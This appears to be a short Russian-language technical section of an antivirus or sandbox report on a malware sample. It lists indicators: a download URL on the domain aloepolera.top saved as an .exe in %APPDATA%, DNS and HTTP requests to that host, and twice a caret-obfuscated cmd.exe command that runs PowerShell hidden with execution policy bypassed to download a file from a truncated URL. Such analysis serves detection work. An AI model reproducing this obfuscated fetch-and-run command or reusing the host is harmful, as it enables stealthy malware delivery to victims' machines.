Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^w^E^R^s^h^e^l^L^.E^xe ^-eXeCUTiO^NpoliC^Y bY^P^as^s^ -N^oprO^fIl^E -^wi^N^d^OwSt^yL^e HiddE^N (nE^W-OBJeCt sYS^t^E^M.N^e^t^.^WeBclie^N^t).d^o^w^nl^O^AdF^Ile^('http://...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /c "p^o^w^E^R^s^h^e^l^L^.E^xe ^-eXeCUTiO^NpoliC^Y bY^P^as^s^ -N^oprO^fIl^E -^wi^N^d^OwSt^yL^e HiddE^N (nE^W-OBJeCt sYS^t^E^M.N^e^t^.^WeBclie^N^t).d^o^w^nl^O^AdF^Ile^('http://...' (со скрытым окном)